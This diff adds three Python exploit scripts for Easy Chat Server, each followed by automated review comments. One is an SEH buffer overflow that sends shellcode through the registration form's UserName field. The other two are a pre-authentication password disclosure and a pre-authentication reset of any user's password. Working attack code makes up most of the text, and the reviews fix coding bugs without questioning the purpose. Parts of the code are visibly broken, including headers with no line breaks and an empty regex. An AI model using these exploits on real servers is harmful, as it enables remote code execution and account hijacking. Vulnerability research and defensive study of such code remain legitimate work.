@@ -0,0 +1,106 @@ +# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH) +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Buffer Overflow +# Severity: Critical +# Tested on: [Windows XP Sp3 Eng] + + +# ====================================================================================================================== +# Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability. +# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. +# ====================================================================================================================== + +# USAGE: python exploit.py ip + +#!/usr/bin/python + +import os +import sys +import socket + +ip = sys.argv[1] + +socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) + +socket.connect((ip , 80)) + +#AlphanumericShellcode + +shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43" +"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" +"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" +"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" +"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33" +"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44" +"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30" +"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a" +"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43" +"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47" +"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c" +"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43" +"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55" +"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39" 
+"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e" +"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50" +"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31" +"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31" +"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35" +"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30" +"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31" +"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a" +"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36" +"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f" +"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58" +"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34" +"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b" +"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d" +"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39" +"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50" +"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56" +"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45" +"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59" +"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f" +"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45" +"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50" +"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32" +"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57" +"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57" +"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46" +"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31" +"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f" +"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56" +"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45" +"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a" 
+"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c" +"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37" +"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f" +"\x4e\x35\x41\x41") + +magic = "B" * 217 +magic += "\xeb\x06\x90\x90" +magic += "\xBC\x04\x01\x10" +magic += shellcode + +magic += "C" * 200 + + +buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n" +buffer += "Host: 192.168.1.11" +buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" +buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +buffer += "Accept-Language: en-US,en;q=0.5" +buffer += "Accept-Encoding: gzip, deflate" +buffer += "Referer: http://192.168.1.11/register.ghp" +buffer += "Connection: close" +buffer += "Content-Type: application/x-www-form-urlencoded" + +buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" + +socket.send(buffer) + +data = socket.recv(4096) +print data +socket.close() diff --git a/platforms/windows/webapps/42153.py b/platforms/windows/webapps/42153.py new file mode 100755 index 000000000..b9c7418ab --- /dev/null +++ b/platforms/windows/webapps/42153.py 
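Review bot: `socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)` rebinds the imported module name to the connection object, so nothing after that line can reach `socket.*` again; name the instance `sock` (42154.py has the same pattern). The `#!/usr/bin/python` line appears after the comment block, where it is just another comment rather than a shebang; move it to line 1 if it is meant to select the interpreter — 42153.py and 42154.py do the same. The header's `Date: 09/10/2017` disagrees with files.csv, which records 42155 (and 42153/42154) as 2017-06-09; one of the two should be corrected. `os` is imported but unused.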
@@ -0,0 +1,40 @@ +# Exploit Title: Easy Chat Server Remote Password Disclosure +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Pre-Auth Remote Password Disclosure +# Severity: Critical + +# ========================================================================================================= +# Registeration page 'register.ghp' allows disclosing ANY user's password. +# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password. +# ========================================================================================================= + +# USAGE: python exploit.py ip username + +#!/usr/bin/python + +import urllib +import re +import requests +import sys + +ip = sys.argv[1] +username = sys.argv[2] + +url = 'http://' + ip + '/register.ghp?username=' + username + '&password=' +response = requests.get(url) +html = response.content + +pattern = '' +result = re.compile(pattern) + +password = re.findall(result,html) + +x = ''.join(password) + +password = x.replace("[", "") +password = x.replace("]", "") + +print "Password: " + password diff --git a/platforms/windows/webapps/42154.py b/platforms/windows/webapps/42154.py new file mode 100755 index 000000000..312a543e6 --- /dev/null +++ b/platforms/windows/webapps/42154.py 
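Review bot: Both `replace` calls start from `x`, so `password = x.replace("]", "")` discards the result of the preceding `"["` removal; chain them, `password = x.replace("[", "").replace("]", "")`. `pattern = ''` is empty as rendered — an HTML-looking literal may have been stripped from this view — but if the stored file really has an empty pattern, `re.findall` yields only empty strings and the script prints nothing useful, so this is worth checking against the committed file. `urllib` is imported but unused, and the `#!/usr/bin/python` line is not the first line of the file, so it is not an effective shebang.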
@@ -0,0 +1,45 @@ +# Exploit Title: Easy Chat Server Remote Password Reset +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Pre-Auth Remote Password Reset +# Severity: Critical + +# ==================================================================================================== +# Registeration page 'register.ghp' allows resetting ANY user's password. +# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account. +# ==================================================================================================== + +# USAGE: python exploit.py ip port username password + +#!/usr/bin/python + +import os,sys,socket + +ip = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + +socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) + +socket.connect((ip , 80)) + + +buffer = "POST /registresult.htm HTTP/1.1" +buffer += "Host: 192.168.1.11" +buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" +buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +buffer += "Accept-Language: en-US,en;q=0.5" +buffer += "Accept-Encoding: gzip, deflate" +buffer += "Connection: close" +buffer += "Content-Type: application/x-www-form-urlencoded" + +buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change" + +socket.send(buffer) + +socket.close() + +print "[#] Password Changed Successfully" +
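Review bot: The final `print "[#] Password Changed Successfully"` runs unconditionally — the script never reads the server's response — so it reports success even when the request failed; report what the code actually knows, e.g. `print "[#] Request sent (response not checked)"`. The `# USAGE: python exploit.py ip port username password` comment does not match the code, which reads only `sys.argv[1]` through `sys.argv[3]` as ip, username and password and hard-codes port 80; fix the comment or the argument handling. `socket` is rebound to the connection object, shadowing the module, and `os` is imported but unused.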